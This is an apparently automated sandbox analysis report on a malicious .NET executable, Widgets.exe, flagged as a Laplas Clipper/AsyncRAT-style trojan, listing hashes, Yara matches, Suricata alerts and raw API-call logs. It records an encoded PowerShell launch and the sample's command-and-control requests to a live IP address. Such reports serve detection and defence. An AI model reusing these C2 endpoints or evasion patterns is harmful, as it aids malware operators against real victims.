Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 15, 2023, 8:44 a.m.	May 15, 2023, 8:46 a.m.

Size	1.8MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`f0016739c32ff1b375e9bf3008a56991`
SHA256	`e7ebc6c68a23bfb0d6f9d46c14b27b03f4aaeaafbcec81418f10f3bc190d523d`
CRC32	`58D5D500`
ssdeep	`49152:INyYP8XVYvxSb1efaWqHnLJECyjUqldcOR:INyI8FRndHn5QKOR`
Yara	UPX_Zero - UPX packed file Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen OS_Processor_Check_Zero - OS Processor Check Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet Malicious_Library_Zero - Malicious_Library CAB_file_format - CAB archive file Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT PE_Header_Zero - PE File Signature IsPE32 - (no description) Malicious_Packer_Zero - Malicious Packer

Widgets.exe "C:\Users\test22\AppData\Local\Temp\Widgets.exe"
296
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
  2164
- Widgets.exe C:\Users\test22\AppData\Local\Temp\Widgets.exe
  2680

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
79.137.195.205	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 79.137.195.205:80	2039776	ET MALWARE Laplas Clipper - SetOnline CnC Checkin	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 79.137.195.205:80	2039776	ET MALWARE Laplas Clipper - SetOnline CnC Checkin	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 15, 2023, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 15, 2023, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 15, 2023, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 15, 2023, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 15, 2023, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 15, 2023, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 15, 2023, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 15, 2023, 8:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 15, 2023, 8:44 a.m.			0	0
IsDebuggerPresent May 15, 2023, 8:44 a.m.			0	0
IsDebuggerPresent May 15, 2023, 8:44 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (43 events)

Time & API	Arguments	Status	Return
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0088e248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0088e248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0088e348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00525fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00525908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00525908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00525908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00525908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00525908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00525908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00526448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005264c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 15, 2023, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005264c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 15, 2023, 8:44 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ May 15, 2023, 8:44 a.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 mscorlib+0x32d2cd @ 0x7224d2cd mscorlib+0x32d233 @ 0x7224d233 mscorlib+0x32d12a @ 0x7224d12a 0xa9d8b0 0xa99ef7 0xa990ff 0xa98429 0xa975e1 0xa901d6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7411f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 5630872 registers.edi: 0 registers.eax: 5630872 registers.ebp: 5630952 registers.edx: 0 registers.ebx: 9212096 registers.esi: 8870264 registers.ecx: 3107687063	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

May 15, 2023, 8:44 a.m.

stacktrace:

CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1
mscorlib+0x32d2cd @ 0x7224d2cd
mscorlib+0x32d233 @ 0x7224d233
mscorlib+0x32d12a @ 0x7224d12a
0xa9d8b0
0xa99ef7
0xa990ff
0xa98429
0xa975e1
0xa901d6
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7411f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 5630872
registers.edi: 0
registers.eax: 5630872
registers.ebp: 5630952
registers.edx: 0
registers.ebx: 9212096
registers.esi: 8870264
registers.ecx: 3107687063

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://79.137.195.205/bot/regex
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://79.137.195.205/bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34

Performs some HTTP requests (2 events)

request	GET http://79.137.195.205/bot/regex
request	GET http://79.137.195.205/bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34

Allocates read-write-execute memory (usually to unpack itself) (50 out of 237 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74182000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a80000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x740fb000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00920000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0077c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7402a000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00795000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00797000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0078a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00787000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d91000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0077a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d7f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aaf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00786000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d51000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70141000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a9e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0077d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
